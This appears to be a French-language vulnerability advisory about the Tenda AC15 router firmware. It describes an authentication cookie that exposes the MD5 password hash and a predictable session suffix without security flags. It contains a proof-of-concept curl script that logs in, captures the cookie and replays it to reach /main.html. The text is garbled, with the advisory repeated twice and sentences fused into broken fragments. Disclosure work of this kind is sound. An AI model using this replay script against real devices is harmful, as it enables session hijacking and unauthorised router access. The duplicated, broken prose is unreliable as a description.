
Exposition de cookie Tenda AC15
Le firmware Tenda AC15 V15.03.05.18_multi émet un cookie d'authentification sous la forme password=<MD5(password)><suffixe de 6 caractères> et le renvoie sans les indicateurs HttpOnly, Secure ou SameSite, exposant ainsi le hachage du mot de passe au client.
Le suffixe à faible entropie agit comme un identifiant de session prévisible, permettant aux attaquants de rejouer ou de détourner les sessions.
/login/Auth émet un cookie password=<MD5(password)><suffixe de 6 caractères>.HttpOnly, Secure, SameSite).document.cookie) et réutilisé dans des requêtes vers /main.html.PW_HASH=$(echo -n 'ringzer0' | md5sum | cut -d' ' -f1)
curl -v --compressed -c cookies.txt -D headers.txt -X POST \
"http://192.168.141.128:20080/login/Auth" \
-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
--data "username=admin&password=${PW_HASH}"
COOKIE=$(awk 'NF && $0!~/^#/ {print $6"="$7; exit}' cookies.txt)
curl -s -i -H "Cookie: ${COOKIE}" "http://192.168.141.128:20080/main.html" | sed -n '1,40p'
HttpOnly, Secure et SameSite aux cookies d'authentification.Le firmware Tenda AC15 V15.03.05.18_multi émet un cookie d'authentification sous la forme password=<MD5(password)><suffixe de 6 caractères> et le renvoie sans les indicateurs HttpOnly, Secure ou SameSite, exposant ainsi le hachage du mot de passe au client.
Le suffixe à faible entropie agit comme un identifiant de session prévisible, permettant la réutilisation ou le détournement de sessions.
/login/Auth émet un cookie de la forme password=<MD5(password)><suffixe de 6 caractères>.HttpOnly, Secure, SameSite.document.cookie) et réutilisé dans des requêtes vers /main.html.PW_HASH=$(echo -n 'ringzer0' | md5sum | cut -d' ' -f1)
curl -v --compressed -c cookies.txt -D headers.txt -X POST \
"http://192.168.141.128:20080/login/Auth" \
-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
--data "username=admin&password=${PW_HASH}"
COOKIE=$(awk 'NF && $0!~/^#/ {print $6"="$7; exit}' cookies.txt)
curl -s -i -H "Cookie: ${COOKIE}" "http://192.168.141.128:20080/main.html" | sed -n '1,40p'
HttpOnly, Secure, SameSite aux cookies d'authentification.